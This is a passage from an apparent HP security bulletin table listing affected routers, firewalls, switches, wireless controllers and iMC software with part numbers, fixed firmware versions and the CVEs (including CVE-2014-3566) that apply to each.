version\n MSR201X_5.20.R2513L40.RU\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR 50 Processor Module (0231A791)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50 G2 Russian version\n MSR201X_5.20.R2513L40.RU\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR9XX\n R2513P33\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\nJG207A HP MSR900-W Router (NA)\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2)\nH3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR93X\n R2513P33\n JG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR1000\n R2513P33\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR1000 Russian version\n R2513L40.RU\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR2000\n R0106P18\n JG411A HP MSR2003 AC Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nMSR3000\n R0106P18\n JG404A HP MSR3064 Router\nJG405A HP MSR3044 Router\nJG406A HP MSR3024 AC Router\nJG409A HP MSR3012 AC Router\nJG861A HP MSR3024 TAA-compliant AC Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nMSR4000\n R0106P18\n JG402A HP MSR4080 Router Chassis\nJG403A HP MSR4060 Router Chassis\nJG412A HP MSR4000 MPU-100 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nF5000\n F3210P22\n JG216A HP F5000 Firewall Standalone Chassis\nJD259A HP A5000-A5 VPN Firewall Chassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n\n CVE-2014-3566\nCVE-2014-3568\n\nF5000-C\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF5000-S\n R3811P03\n JG370A HP F5000-S VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nU200S and CS\n F5123P30\n JD268A HP 200-CS UTM Appliance\nJD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n\n CVE-2014-3566\nCVE-2014-3568\n\nU200A and M\n F5123P30\n JD274A HP 200-M UTM Appliance\nJD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade III\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module\nJG372A HP 10500/11900/7500 20Gbps VPN FW Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade FW\n R3181P05\n JC635A HP 12500 VPN Firewall Module\nJD245A HP 9500 VPN Firewall Module\nJD249A HP 10500/7500 Advanced VPN Firewall Mod\nJD250A HP 6600 Firewall Processing Rtr Module\nJD251A HP 8800 Firewall Processing Module\nJD255A HP 5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV)\nH3C S7500E SecBlade VPN Firewall Module (0231A832)\nH3C SR66 Gigabit Firewall Module (0231A88A)\nH3C SR88 Firewall Processing Module (0231A88L)\nH3C S5820 SecBlade VPN Firewall Module (0231A94J)\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-E\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-A\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-S\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade SSL VPN\n Fix in Progress\nUse Mitigation\n JD253A HP 10500/7500 SSL VPN Mod w 500-user Lic\n\n CVE-2014-3566\nCVE-2014-3568\n\nVSR1000\n R0204P01\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router\nJG812AAE HP VSR1004 Comware 7 Virtual Services Router\nJG813AAE HP VSR1008 Comware 7 Virtual Services Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nWX5002/5004\n R2507P34\n JD441A HP 5800 ACM for 64-256 APs\nJD447B HP WX5002 Access Controller\nJD448A HP A-WX5004 Access Controller\nJD448B HP WX5004 Access Controller\nJD469A HP A-WX5004 (3Com) Access Controller\nJG261A HP 5800 Access Controller OAA TAA Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 850/870\n R2607P34\n JG723A HP 870 Unified Wired-WLAN Appliance\nJG725A HP 870 Unifd Wrd-WLAN TAA Applnc\nJG722A HP 850 Unified Wired-WLAN Appliance\nJG724A HP 850 Unifd Wrd-WLAN TAA Applnc\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 830\n R3507P34\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch\nJG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch\nJG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch\nJG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 6000\n R2507P34\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod\nJG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nVCX\n Fix in Progress\nUse Mitigation\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\nJ9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\nJC517A HP VCX V7205 Platform w/DL 360 G6 Server\nJE355A HP VCX V6000 Branch Platform 9.0\nJC516A HP VCX V7005 Platform w/DL 120 G6 Server\nJC518A HP VCX Connect 200 Primry 120 G6 Server\nJ9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\nJE341A HP VCX Connect 100 Secondary\nJE252A HP VCX Connect Primary MIM Module\nJE253A HP VCX Connect Secondary MIM Module\nJE254A HP VCX Branch MIM Module\nJE355A HP VCX V6000 Branch Platform 9.0\nJD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\nJD023A HP MSR30-40 Router with VCX MIM Module\nJD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\nJD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\nJD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\nJD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\nJD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\nJE340A HP VCX Connect 100 Pri Server 9.0\nJE342A HP VCX Connect 100 Sec Server 9.0\n\n CVE-2014-3566\nCVE-2014-3568\n\niMC PLAT\n iMC PLAT v7.1 E0303P06\n JD125A HP IMC Std S/W Platform w/100-node\nJD126A HP IMC Ent S/W Platform w/100-node\nJD808A HP IMC Ent Platform w/100-node License\nJD815A HP IMC Std Platform w/100-node License\nJF377A HP IMC Std S/W Platform w/100-node Lic\nJF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\nJF378A HP IMC Ent S/W Platform w/200-node Lic\nJF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\nJG546AAE HP IMC Basic SW Platform w/50-node E-LTU\nJG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\nJG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\nJG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU\nJG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\nJG659AAE HP IMC Smart Connect VAE E-LTU\nJG660AAE HP IMC Smart Connect w/WLM VAE E-LTU\nJG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\nJG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\nJG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU\nJG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU\nJG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n\n CVE-2014-3566\n\niMC UAM\n iMC UAM v7.1 E0302P07\n JD144A HP IMC UAM S/W Module w/200-User License\nJF388A HP IMC UAM S/W Module w/200-user License\nJF388AAE HP IMC UAM S/W Module w/200-user E-LTU\nJG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU\n\n CVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\n\niMC WSM\n Fix in Progress\nUse Mitigation\n JD456A HP WSM Plug-in for IMC\nIncludes 50 Aps\nJF414A HP IMC WSM S/W Module with 50-AP License\nJF414AAE HP IMC WSM S/W Module with 50-AP E-LTU\nJG551AAE HP PMM to IMC WSM Upgr w/250 AP E-LTU\nJG769AAE HP PMM to IMC WSM Upg w/ 250-node E-LTU\n\n CVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\n\nA\n Fixes in progress\nuse mitigations\n J9565A HP 2615-8-PoE Switch\nJ9562A HP 2915-8G-PoE Switch\n\nE\n Fixes in progress\nuse mitigations\n J4850A HP ProCurve Switch 5304xl\nJ8166A HP ProCurve Switch 5304xl-32G\nJ4819A HP ProCurve Switch 5308xl\nJ8167A HP ProCurve Switch 5308xl-48G\nJ4849A HP ProCurve Switch 5348xl\nJ4849B HP ProCurve Switch 5348xl\nJ4848A HP ProCurve Switch 5372xl\nJ4848B HP ProCurve Switch 5372xl\n\nF\n Fixes in progress\nuse mitigations\n J4812A HP ProCurve 2512 Switch\nJ4813A HP ProCurve 2524 Switch\nJ4817A HP ProCurve 2312 Switch\nJ4818A HP ProCurve 2324 Switch\n\nH.07\n Fixes in progress\nuse mitigations\n J4902A HP ProCurve 6108 Switch\n\nH.10\n Fixes in progress\nuse mitigations\n J8762A HP E2600-8-PoE Switch\nJ4900A HP PROCURVE SWITCH 2626\nJ4900B HP ProCurve Switch 2626\nJ4900C ProCurve Switch 2626\nJ4899A HP ProCurve Switch 2650\nJ4899B HP ProCurve Switch 2650\nJ4899C ProCurve Switch 2650\nJ8164A ProCurve Switch 2626-PWR\nJ8165A HP ProCurve Switch 2650-PWR\n\ni.10\n Fixes in progress\nuse mitigations\n J4903A ProCurve Switch 2824\nJ4904A HP ProCurve Switch 2848\n\nJ\n Fixes in progress\nuse mitigations\n J9299A HP 2520-24G-PoE Switch\nJ9298A HP 2520-8G-PoE Switch\n\nK\n Fixes in progress\nuse mitigations\n J8692A HP 3500-24G-PoE yl Switch\nJ8693A HP 3500-48G-PoE yl Switch\nJ9310A HP 3500-24G-PoE+ yl Switch\nJ9311A HP 3500-48G-PoE+ yl Switch\nJ9470A HP 3500-24 Switch\nJ9471A HP 3500-24-PoE Switch\nJ9472A HP 3500-48 Switch\nJ9473A HP 3500-48-PoE Switch\nJ8697A HP E5406 zl Switch Chassis\nJ8699A HP 5406-48G zl Switch\nJ9447A HP 5406-44G-PoE+-4SFP zl Switch\nJ9533A HP 5406-44G-PoE+-2XG v2 zl Swch w Pm SW\nJ9539A HP 5406-44G-PoE+-4G v2 zl Swch w Prm SW\nJ9642A HP 5406 zl Switch with Premium Software\nJ9866A HP 5406 8p10GT 8p10GE Swch and Psw\nJ8698A HP E5412 zl Switch Chassis\nJ8700A HP 5412-96G zl Switch\nJ9448A HP 5412-92G-PoE+-4SFP zl Switch\nJ9532A HP 5412-92G-PoE+-2XG v2 zl Swch w Pm SW\nJ9540A HP 5412-92G-PoE+-4G v2 zl Swch w Prm SW\nJ9643A HP 5412 zl Switch with Premium Software\nJ8992A HP 6200-24G-mGBIC yl Switch\nJ9263A HP E6600-24G Switch\nJ9264A HP 6600-24G-4XG Switch\nJ9265A HP 6600-24XG Switch\nJ9451A HP E6600-48G Switch\nJ9452A HP 6600-48G-4XG Switch\nJ9475A HP E8206 zl Switch Base System\nJ9638A HP 8206-44G-PoE+-2XG v2 zl Swch w Pm SW\nJ9640A HP 8206 zl Switch w/Premium Software\nJ8715A ProCurve Switch 8212zl Base System\nJ8715B HP E8212 zl Switch Base System\nJ9091A ProCurve Switch 8212zl Chassis\u0026Fan Tray\nJ9639A HP 8212-92G-PoE+-2XG v2 zl Swch w Pm SW\nJ9641A HP 8212 zl Switch with Premium SW\n\nKA\n Fixes in progress\nuse mitigations\n J9573A HP 3800-24G-PoE+-2SFP+ Switch\nJ9574A HP 3800-48G-PoE+-4SFP+ Switch\nJ9575A HP 3800-24G-2SFP+ Switch\nJ9576A HP 3800-48G-4SFP+ Switch\nJ9584A HP 3800-24SFP-2SFP+ Switch\nJ9585A HP 3800-24G-2XG Switch\nJ9586A HP 3800-48G-4XG Switch\nJ9587A HP 3800-24G-PoE+-2XG Switch\nJ9588A HP 3800-48G-PoE+-4XG Switch\n\nKB\n Fixes in progress\nuse mitigations\n J9821A HP 5406R zl2 Switch\nJ9822A HP 5412R zl2 Switch\nJ9823A HP 5406R-Gig-T-PoE+/SFP+ v2 zl2 Swch\nJ9824A HP 5406R-Gig-T-PoE+/SFP v2 zl2 Swch\nJ9825A HP 5412R-Gig-T-PoE+/SFP+ v2 zl2 Swch\nJ9826A HP 5412R-Gig-T-PoE+/SFP v2 zl2 Swch\nJ9850A HP 5406R zl2 Switch\nJ9851A HP 5412R zl2 Switch\nJ9868A HP 5406R-8XGT/8SFP+ v2 zl2 Swch\n\nL\n Fixes in progress\nuse mitigations\n J8772B HP 4202-72 Vl Switch\nJ8770A HP 4204 Vl Switch Chassis\nJ9064A HP 4204-44G-4SFP Vl Switch\nJ8773A HP 4208 Vl Switch Chassis\nJ9030A HP 4208-68G-4SFP Vl Switch\nJ8775B HP 4208-96 Vl Switch\nJ8771A ProCurve Switch 4202VL-48G\nJ8772A ProCurve Switch 4202VL-72\nJ8774A ProCurve Switch 4208VL-64G\nJ8775A ProCurve Switch 4208VL-96\n\nM.08\n Fixes in progress\nuse mitigations\n J8433A HP 6400-6XG cl Switch\nJ8474A HP 6410-6XG cl Switch\n\nM.10\n Fixes in progress\nuse mitigations\n J4906A HP E3400-48G cl Switch\nJ4905A HP ProCurve Switch 3400cl-24G\n\nN\n Fixes in progress\nuse mitigations\n J9021A HP 2810-24G Switch\nJ9022A HP 2810-48G Switch\n\nPA\n Fixes in progress\nuse mitigations\n J9029A ProCurve Switch 1800-8G\n\nPB\n Fixes in progress\nuse mitigations\n J9028A ProCurve Switch 1800-24G\nJ9028B ProCurve Switch 1800-24G\n\nQ\n Fixes in progress\nuse mitigations\n J9019B HP 2510-24 Switch\nJ9019A ProCurve Switch 2510-24\n\nR\n Fixes in progress\nuse mitigations\n J9085A HP 2610-24 Switch\nJ9087A HP 2610-24-PoE Switch\nJ9086A HP 2610-24-PPoE Switch\nJ9088A HP 2610-48 Switch\nJ9089A HP 2610-48-PoE Switch\n\nRA\n Fixes in progress\nuse mitigations\n J9623A HP 2620-24 Switch\nJ9624A HP 2620-24-PPoE+ Switch\nJ9625A HP 2620-24-PoE+ Switch\nJ9626A HP 2620-48 Switch\nJ9627A HP 2620-48-PoE+ Switch\n\nS\n Fixes in progress\nuse mitigations\n J9138A HP 2520-24-PoE Switch\nJ9137A HP 2520-8-PoE Switch\n\nT\n Fixes in progress\nuse mitigations\n J9049A ProCurve Switch 2900- 24G\nJ9050A ProCurve Switch 2900 48G\n\nU\n Fixes in progress\nuse mitigations\n J9020A HP 2510-48 Switch\n\nVA\n Fixes in progress\nuse mitigations\n J9079A HP 1700-8 Switch\n\nVB\n Fixes in progress\nuse mitigations\n J9080A HP 1700-24 Switch\n\nW\n Fixes in progress\nuse mitigations\n J9145A HP 2910-24G al Switch\nJ9146A HP 2910-24G-PoE+ al Switch\nJ9147A HP 2910-48G al Switch\nJ9148A HP 2910-48G-PoE+ al Switch\n\nWB\n Fixes in progress\nuse mitigations\n J9726A HP 2920-24G Switch\nJ9727A HP 2920-24G-POE+ Switch\nJ9728A HP 2920-48G Switch\nJ9729A HP 2920-48G-POE+ Switch\nJ9836A HP 2920-48G-POE+ 740W Switch\n\nY\n Fixes in progress\nuse mitigations\n J9279A HP 2510-24G Switch\nJ9280A HP 2510-48G Switch\n\nYA\n Fixes in progress\nuse mitigations\n J9772A HP 2530-48G-PoE+ Switch\nJ9773A HP 2530-24G-PoE+ Switch\nJ9774A HP 2530-8G-PoE+ Switch\nJ9775A HP 2530-48G Switch\nJ9776A HP 2530-24G Switch\nJ9777A HP 2530-8G Switch\nJ9778A HP 2530-48-PoE+ Switch\nJ9781A HP 2530-48 Switch\nJ9853A HP 2530-48G-PoE+-2SFP+ Switch\nJ9854A HP 2530-24G-PoE+-2SFP+ Switch\nJ9855A HP 2530-48G-2SFP+ Switch\nJ9856A HP 2530-24G-2SFP+ Switch\n\nYB\n Fixes in progress\nuse mitigations\n J9779A HP 2530-24-PoE+ Switch\nJ9780A HP 2530-8-PoE+ Switch\nJ9782A HP 2530-24 Switch\nJ9783A HP 2530-8 Switch\n\nMSM 6.5\n 6.5.1.0\n J9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9370A HP MSM765 Zl Premium Mobility Controller\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\nJ9840A HP MSM775 zl Premium Controller Module\nJ9845A HP 560 Wireless 802.11ac (AM) AP\nJ9846A HP 560 Wireless 802.11ac (WW) AP\nJ9847A HP 560 Wireless 802.11ac (JP) AP\nJ9848A HP 560 Wireless 802.11ac (IL) AP\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\n\nMSM 6.4\n 6.4.2.1\n J9840A HP MSM775 zl Premium Controller Module\nJ9370A HP MSM765 Zl Premium Mobility Controller\nJ9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\n\nMSM 6.3\n 6.3.1.0\n J9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9356A HP E-MSM335 Access Point (US)\nJ9356B HP MSM335 Access Point (US)\nJ9357A HP E-MSM335 Access Point (WW)\nJ9357B HP MSM335 Access Point (WW)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9360A HP E-MSM320 Access Point (US)\nJ9360B HP MSM320 Access Point (US)\nJ9364A HP E-MSM320 Access Point (WW)\nJ9364B HP MSM320 Access Point (WW)\nJ9365A HP MSM320-R Access Point (US)\nJ9365B HP MSM320-R Access Point (US)\nJ9368A HP E-MSM320-R Access Point (WW)\nJ9368B HP MSM320-R Access Point (WW)\nJ9373A HP E-MSM325 Access Point (WW)\nJ9373B HP MSM325 Access Point (WW)\nJ9374A HP E-MSM310 Access Point (US)\nJ9374B HP MSM310 Access Point (US)\nJ9379A HP MSM310 Access Point (WW)\nJ9379B HP MSM310 Access Point (WW)\nJ9380A HP E-MSM310-R Access Point (US)\nJ9380B HP MSM310-R Access Point (US)\nJ9383A HP E-MSM310-R Access Point (WW)\nJ9383B HP MSM310-R Access Point (WW)\nJ9524A HP E-MSM310 Access Point (JP)\nJ9524B HP MSM310 Access Point (JP)\nJ9527A HP E-MSM320 Access Point (JP)\nJ9527B HP MSM320 Access Point (JP)\nJ9528A HP E-MSM320-R Access Point (JP)\nJ9528B HP MSM320-R Access Point (JP)\n\nMSM 6.2\n 6.2.1.2\n J9370A HP MSM765 Zl Premium Mobility Controller\nJ9356A HP E-MSM335 Access Point (US)\nJ9356B HP MSM335 Access Point (US)\nJ9357A HP E-MSM335 Access Point (WW)\nJ9357B HP MSM335 Access Point (WW)\nJ9358A HP E-MSM422 Access Point (US)\nJ9358B HP MSM422 Access Point (US)\nJ9359A HP E-MSM422 Access Point (WW)\nJ9359B HP MSM422 Access Point (WW)\nJ9530A HP E-MSM422 Access Point (JP)\nJ9530B HP MSM422 Access Point (JP)\nJ9617A HP MSM422 Dual Radio 802.11n AP (IL)\nJ9420A HP MSM760 Premium Mobility Controller\nJ9421A HP MSM760 Access Controller\nJ9840A HP MSM775 zl Premium Controller Module\nJ9360A HP E-MSM320 Access Point (US)\nJ9360B HP MSM320 Access Point (US)\nJ9364A HP E-MSM320 Access Point (WW)\nJ9364B HP MSM320 Access Point (WW)\nJ9365A HP MSM320-R Access Point (US)\nJ9365B HP MSM320-R Access Point (US)\nJ9368A HP E-MSM320-R Access Point (WW)\nJ9368B HP MSM320-R Access Point (WW)\nJ9373A HP E-MSM325 Access Point (WW)\nJ9373B HP MSM325 Access Point (WW)\nJ9374A HP E-MSM310 Access Point (US)\nJ9374B HP MSM310 Access Point (US)\nJ9379A HP MSM310 Access Point (WW)\nJ9379B HP MSM310 Access Point (WW)\nJ9380A HP E-MSM310-R Access Point (US)\nJ9380B HP MSM310-R Access Point (US)\nJ9383A HP E-MSM310-R Access Point (WW)\nJ9383B HP MSM310-R Access Point (WW)\nJ9524A HP E-MSM310 Access Point (JP)\nJ9524B HP MSM310 Access Point (JP)\nJ9527A HP E-MSM320 Access Point (JP)\nJ9527B HP MSM320 Access Point (JP)\nJ9528A HP E-MSM320-R Access Point (JP)\nJ9528B HP MSM320-R Access Point (JP)\nJ9426A HP E-MSM410 Access Point (US)\nJ9426B HP MSM410 Access Point (US)\nJ9427A HP E-MSM410 Access Point (WW)\nJ9427B HP MSM410 Access Point (WW)\nJ9427C HP MSM410 Access Point (WW)\nJ9529A HP E-MSM410 Access Point (JP)\nJ9529B HP MSM410 Access Point (JP)\nJ9589A HP MSM460 Dual Radio 802.11n AP (JP)\nJ9590A HP MSM460 Dual Radio 802.11n AP (AM)\nJ9591A HP MSM460 Dual Radio 802.11n AP (WW)\nJ9616A HP MSM410 Single Radio 802.11n AP (IL)\nJ9618A HP MSM460 Dual Radio 802.11n AP (IL)\nJ9619A HP MSM466 Dual Radio 802.11n AP (IL)\nJ9620A HP MSM466 Dual Radio 802.11n AP (JP)\nJ9621A HP MSM466 Dual Radio 802.11n AP (AM)\nJ9622A HP MSM466 Dual Radio 802.11n AP (WW)\nJ9650A HP MSM430 Dual Radio 802.11n AP (AM)\nJ9651A HP MSM430 Dual Radio 802.11n AP (WW)\nJ9652A HP MSM430 Dual Radio 802.11n AP (JP)\nJ9653A HP MSM430 Dual Radio 802.11n AP (IL)\nJ9654A HP MSM430 Dual Radio 802.11n TAA AP\nJ9655A HP MSM460 Dual Radio 802.11n TAA AP\nJ9656A HP MSM466 Dual Radio 802.11n TAA AP\nJ9715A HP E-MSM466-R Dual Radio 802.11n AP (AM)\nJ9716A HP E-MSM466-R Dual Radio 802.11n AP (WW)\nJ9717A HP E-MSM466-R Dual Radio 802.11n AP (JP)\nJ9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)\nJ9693A HP MSM720 Access Controller (WW)\nJ9694A HP MSM720 Premium 